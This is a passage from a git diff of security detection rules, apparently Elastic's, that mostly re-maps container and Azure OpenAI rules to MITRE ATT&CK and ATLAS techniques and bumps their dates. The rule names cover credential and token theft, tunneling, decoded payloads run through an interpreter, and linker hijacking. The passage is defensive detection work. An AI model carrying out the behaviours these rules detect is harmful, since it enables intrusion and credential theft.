"Impact" +reference = "https://atlas.mitre.org/tactics/AML.TA0011/" diff --git a/rules/integrations/azure_openai/azure_openai_model_theft_detection.toml b/rules/integrations/azure_openai/azure_openai_model_theft_detection.toml index d5cb5f71268..0ed1e394199 100644 --- a/rules/integrations/azure_openai/azure_openai_model_theft_detection.toml +++ b/rules/integrations/azure_openai/azure_openai_model_theft_detection.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/25" integration = ["azure_openai"] maturity = "production" -updated_date = "2025/09/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,14 +62,7 @@ streaming events, see the Azure OpenAI documentation: https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/stream-monitoring-data-event-hubs """ severity = "medium" -tags = [ - "Domain: LLM", - "Data Source: Azure OpenAI", - "Data Source: Azure Event Hubs", - "Use Case: Model Theft", - "Mitre Atlas: T0044", - "Resources: Investigation Guide", -] +tags = ["Domain: LLM", "Tactic: Credential Access", "Tactic: Exfiltration", "Tactic: AI Model Access", "Data Source: Azure OpenAI", "Data Source: Azure Event Hubs", "Use Case: Model Theft", "Mitre Atlas: T0044", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -98,3 +91,54 @@ from logs-azure_openai.logs-* Esql.event_count desc ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0040" +name = "AI Model Inference API Access" +reference = "https://atlas.mitre.org/techniques/AML.T0040/" + +[rule.threat.tactic] +id = "AML.TA0000" +name = "AI Model Access" +reference = "https://atlas.mitre.org/tactics/AML.TA0000/" + +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0024" +name = "Exfiltration via AI Inference API" +reference = "https://atlas.mitre.org/techniques/AML.T0024/" + +[rule.threat.tactic] +id = "AML.TA0010" +name = "Exfiltration" +reference = "https://atlas.mitre.org/tactics/AML.TA0010/" diff --git a/rules/integrations/beaconing/command_and_control_beaconing.toml b/rules/integrations/beaconing/command_and_control_beaconing.toml index f89fe47c8c3..dc81f134f13 100644 --- a/rules/integrations/beaconing/command_and_control_beaconing.toml +++ b/rules/integrations/beaconing/command_and_control_beaconing.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["beaconing", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -95,19 +95,13 @@ Statistical models analyze network traffic patterns to identify anomalies indica [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1102" -name = "Web Service" -reference = "https://attack.mitre.org/techniques/T1102/" -[[rule.threat.technique.subtechnique]] -id = "T1102.002" -name = "Bidirectional Communication" -reference = "https://attack.mitre.org/techniques/T1102/002/" - +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml b/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml index 0fe0d4d7320..62075e640fe 100644 --- a/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml +++ b/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["beaconing", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -90,19 +90,13 @@ Statistical models analyze network traffic patterns to identify anomalies indica [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1102" -name = "Web Service" -reference = "https://attack.mitre.org/techniques/T1102/" -[[rule.threat.technique.subtechnique]] -id = "T1102.002" -name = "Bidirectional Communication" -reference = "https://attack.mitre.org/techniques/T1102/002/" - +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml b/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml index 98c2b0a4e53..9b376e4d6e1 100644 --- a/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml +++ b/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -72,9 +72,9 @@ process.interactive == true and container.id like "?*" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1572" -name = "Protocol Tunneling" -reference = "https://attack.mitre.org/techniques/T1572/" +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" [rule.threat.tactic] id = "TA0011" diff --git a/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml b/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml index 5d448150ea9..1550a8b19f4 100644 --- a/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml +++ b/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,15 +65,7 @@ references = [ risk_score = 47 rule_id = "a8b08d2d-6dfe-453f-87d1-11d5fc3ec746" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Tactic: Execution", - "Resources: Investigation Guide", -] +tags = ["Tactic: Command and Control", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -95,35 +87,12 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" - - [[rule.threat.technique]] - name = "Application Layer Protocol" - id = "T1071" - reference = "https://attack.mitre.org/techniques/T1071/" - - [[rule.threat.technique.subtechnique]] - name = "Web Protocols" - id = "T1071.001" - reference = "https://attack.mitre.org/techniques/T1071/001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml b/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml index 0e1b024eb19..c2d8e83ee8d 100644 --- a/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml +++ b/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -96,6 +96,11 @@ process where event.type == "start" and event.action == "exec" and ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml b/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml index 67fbebdda38..a2427964654 100644 --- a/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml +++ b/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -107,24 +107,6 @@ process.args like~ ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" @@ -139,3 +121,21 @@ reference = "https://attack.mitre.org/techniques/T1560/001/" id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml b/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml index 6466f00e4a8..1a58af92a38 100644 --- a/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml +++ b/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -60,14 +60,7 @@ references = ["https://sysdig.com/blog/cve-2021-25741-kubelet-falco/"] risk_score = 47 rule_id = "9661ed8b-001c-40dc-a777-0983b7b0c91a" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide", -] +tags = ["Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -119,3 +112,16 @@ reference = "https://attack.mitre.org/techniques/T1552/001/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml b/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml index 1dc98471512..005de67e7ad 100644 --- a/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml +++ b/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/06" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,6 +101,11 @@ any where host.os.type == "linux" and process.interactive == true and container. [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" diff --git a/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml b/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml index a3e3f977696..3b5a90b50ca 100644 --- a/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml +++ b/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -130,45 +130,35 @@ sequence by process.parent.entity_id, container.id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" - [[rule.threat.technique]] - name = "Obfuscated Files or Information" - id = "T1027" - reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" - [[rule.threat.technique]] - name = "Deobfuscate/Decode Files or Information" - id = "T1140" - reference = "https://attack.mitre.org/techniques/T1140/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" - - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" - - [[rule.threat.technique]] - name = "User Execution" - id = "T1204" - reference = "https://attack.mitre.org/techniques/T1204/" - - [[rule.threat.technique.subtechnique]] - name = "Malicious File" - id = "T1204.002" - reference = "https://attack.mitre.org/techniques/T1204/002/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml b/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml index 5da9a158df8..a9a634d7f81 100644 --- a/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml +++ b/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -55,15 +55,7 @@ references = [ risk_score = 73 rule_id = "1dc56174-5d02-4ca4-af92-e391f096fb21" severity = "high" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Resources: Investigation Guide", -] +tags = ["Tactic: Command and Control", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -108,6 +100,19 @@ sequence by container.id, user.id with maxspan=10s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" @@ -136,16 +141,6 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml b/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml index 0538c4cd9c4..8ac47055373 100644 --- a/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml +++ b/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -75,43 +75,30 @@ process where event.type == "start" and event.action == "exec" and process.inter [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" + +[[rule.threat.technique.subtechnique]] +id = "T1564.001" +name = "Hidden Files and Directories" +reference = "https://attack.mitre.org/techniques/T1564/001/" + [rule.threat.tactic] -name = "Defense Evasion" id = "TA0005" +name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat.technique]] -name = "Reflective Code Loading" -id = "T1620" -reference = "https://attack.mitre.org/techniques/T1620/" - [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Execution" -id = "TA0002" -reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1609" +name = "Container Administration Command" +reference = "https://attack.mitre.org/techniques/T1609/" [rule.threat.tactic] -name = "Command and Control" -id = "TA0011" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat.technique]] -name = "Application Layer Protocol" -id = "T1071" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml b/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml index f84f1a58ad4..3de8c254263 100644 --- a/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml +++ b/rules/integrations/cloud_defend/defense_evasion_ld_preload_shared_object_modified_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,14 +66,7 @@ references = [ risk_score = 73 rule_id = "342f834b-21a6-41bf-878c-87d116eba3ee" severity = "high" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -99,3 +92,21 @@ reference = "https://attack.mitre.org/techniques/T1574/006/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml b/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml index 4168f4a7137..0632be00b6b 100644 --- a/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml +++ b/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,15 +54,7 @@ references = [ risk_score = 47 rule_id = "227cf26a-88d1-4bcb-bf4c-925e5875abcf" severity = "medium" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Resources: Investigation Guide", -] +tags = ["Tactic: Defense Evasion", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -82,11 +74,6 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" - [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" @@ -96,31 +83,3 @@ reference = "https://attack.mitre.org/techniques/T1140/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/discovery_dns_enumeration.toml b/rules/integrations/cloud_defend/discovery_dns_enumeration.toml index f09bad36a77..051c350fe9d 100644 --- a/rules/integrations/cloud_defend/discovery_dns_enumeration.toml +++ b/rules/integrations/cloud_defend/discovery_dns_enumeration.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -119,16 +119,6 @@ id = "T1613" name = "Container and Resource Discovery" reference = "https://attack.mitre.org/techniques/T1613/" -[[rule.threat.technique]] -id = "T1016" -name = "System Network Configuration Discovery" -reference = "https://attack.mitre.org/techniques/T1016/" - -[[rule.threat.technique]] -id = "T1049" -name = "System Network Connections Discovery" -reference = "https://attack.mitre.org/techniques/T1049/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/integrations/cloud_defend/discovery_environment_enumeration.toml b/rules/integrations/cloud_defend/discovery_environment_enumeration.toml index f5cef44a7f2..ebc953d4633 100644 --- a/rules/integrations/cloud_defend/discovery_environment_enumeration.toml +++ b/rules/integrations/cloud_defend/discovery_environment_enumeration.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -96,11 +96,6 @@ process.interactive == true and container.id like "*" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" - [[rule.threat.technique]] id = "T1082" name = "System Information Discovery" diff --git a/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml b/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml index 9a67f6171d9..97d638e70c1 100644 --- a/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml +++ b/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -60,14 +60,7 @@ references = [ risk_score = 21 rule_id = "42de0740-8ed8-4b8b-995c-635b56a8bbf4" severity = "low" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Resources: Investigation Guide", -] +tags = ["Tactic: Credential Access", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -93,11 +86,16 @@ any where host.os.type == "linux" and process.interactive == true and container. framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.004" +name = "Private Keys" +reference = "https://attack.mitre.org/techniques/T1552/004/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml b/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml index 81381ad389b..8a09a1d7924 100644 --- a/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml +++ b/rules/integrations/cloud_defend/discovery_privilege_boundary_enumeration_from_interactive_process.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/06" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,16 +93,16 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" reference = "https://attack.mitre.org/techniques/T1613/" -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" diff --git a/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml b/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml index 5e447e2221b..1f55491b7bd 100644 --- a/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml +++ b/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/06" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,11 +101,6 @@ id = "T1613" name = "Container and Resource Discovery" reference = "https://attack.mitre.org/techniques/T1613/" -[[rule.threat.technique]] 